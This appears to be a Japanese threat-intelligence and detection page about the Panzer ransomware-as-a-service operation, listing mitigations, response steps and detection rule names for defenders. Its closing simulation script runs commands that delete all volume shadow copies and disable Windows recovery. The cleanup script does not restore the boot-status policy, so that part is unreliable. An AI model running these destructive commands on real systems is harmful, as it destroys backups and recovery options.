Panzerランサムウェア:新しいRaaSがイタリアの製造業者と通信プロバイダーを襲撃
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Panzerは、2026年8月に初めて観測された新たに登場したランサムウェア・アズ・ア・サービス(RaaS)オペレーションです。このグループは成熟したアフィリエイトプラットフォームを運営し、Windows、Linux、ESXi、FreeBSD環境にわたる攻撃をサポートしています。Panzerは二重脅迫モデルを採用し、被害者に対する圧力を高めるために、データの抽出を優先してシステムを暗号化します。
調査
この報告書では、Panzerの急速な台頭、洗練されたアフィリエイトダッシュボード、イタリアの製造業および通信企業を標的とする手法を調査します。研究者たちは、アナリストを検出するための自動スクリーニングメカニズムを特定し、VMware ESXi環境へのサポートも確認しました。確認されたマルウェアサンプルやネットワークIOCが公開されていないため、行動検出が特に重要です。
緩和策
組織はフィッシング耐性のあるMFAを実装し、最小限特権アクセスを強制し、特にハイパーバイザーの管理インターフェース周辺で強力なネットワークセグメンテーションを維持する必要があります。ランサムウェアの暗号化による影響を減少させるために、改変不能かつオフラインのバックアップが重要です。また、DLP制御を展開して、大規模なデータ抽出を識別しブロックすることも求められます。
対応
影のコピー削除や異常なRMMツールの実行を含むPanzerの可能な活動が検知された場合、影響を受けたホストは直ちに隔離されるべきです。セキュリティチームは、疑わしいVPN認証および無認可のサービスアカウントの作成を調査すべきです。インシデントレスポンス計画は、データ復旧要件とGDPRおよびNIS2に関連する規制義務の両方に対処するべきです。
攻撃フロー
この部分はまだ更新中です。
検出
疑わしいBcdeditの実行(コマンドライン経由)
管理者アカウントまたはグループの列挙の可能性(コマンドライン経由)
疑わしいVSSADMIN活動(コマンドライン経由)
代替リモートアクセス/管理ソフトウェア(プロセス作成経由)
PsExecまたは類似の手法によるラテラルムーブメントの可能性(システム経由)
代替リモートアクセス/管理ソフトウェア(システム経由)
PsExecの使用の可能性(監査経由)
代替リモートアクセス/管理ソフトウェア(監査経由)
ランサムウェア活動が差し迫っていることを示す影のコピー削除[Windowsレジストリエベント]
ラテラルムーブメントおよびデータ抽出活動の可能性を検知[Windowsプロセス作成]
シミュレーション実行
前提: テレメトリとベースラインの事前チェックが合格していること。
合理性: このセクションでは、検出ルールをトリガーするために設計された敵対者の技術(TTP)の正確な実行を詳細に説明します。コマンドと説明は識別されたTTPに直接反映され、検出ロジックが期待する正確なテレメトリを生成することを目指しています。抽象的または無関連な例は誤診を招きます。
-
攻撃の概要とコマンド: 敵対者が初期アクセスを得て、ランサムウェア攻撃の暗号化フェーズの準備を進めています。影響を最大化し、回復を防ぐために、攻撃者はWindowsリカバリ環境を無効にし、すべての既存のボリュームシャドウコピーを削除するつもりです。攻撃者は
vssadmin.exeを使用してシャドウコピーを対象とし、bcdedit.exeを使用してブート構成が簡単に回復できないようにします。これらのアクションは「ノイズ」がありますが、強化されていないシステムに対して効果的です。 -
回帰テストスクリプト:
# シミュレーションスクリプト: ランサムウェアのシャドウコピー削除 # 注意: このスクリプトを成功させるためには管理者として実行する必要があります。 Write-Host "[!] シミュレーション開始: シャドウコピー削除" -ForegroundColor Yellow # 1. VSSAdminシャドウコピー削除のシミュレーション Write-Host "[+] vssadminコマンド実行中..." -ForegroundColor Cyan Start-Process "vssadmin.exe" -ArgumentList "delete shadows /all /quiet" -Wait -WindowStyle Hidden # 2. BCDeditリカバリ無効化のシミュレーション Write-Host "[+] bcdeditコマンド実行中..." -ForegroundColor Cyan # 注意: セキュアブートが有効な場合には失敗する可能性がありますが、プロセスの実行そのものはログに記録されます。 Start-Process "bcdedit.exe" -ArgumentList "recoveryenabled no" -Wait -WindowStyle Hidden Start-Process "bcdedit.exe" -ArgumentList "bootstatuspolicy ignoreall" -Wait -WindowStyle Hidden Write-Host "[!] シミュレーション完了。SIEMでアラートをチェックしてください。" -ForegroundColor Green -
クリーンアップコマンド:
# クリーンアップ: リカバリ設定の再有効化(シミュレーションが成功した場合) Write-Host "[!] 環境のクリーンアップ中..." -ForegroundColor Cyan Start-Process "bcdedit.exe" -ArgumentList "recoveryenabled yes" -Wait -WindowStyle Hidden Start-Process "bcdedit.exe" -ArgumentList "bootstatuspolicy ignoreall" -Wait -WindowStyle Hidden Write-Host "[!] クリーンアップ完了。" -ForegroundColor Green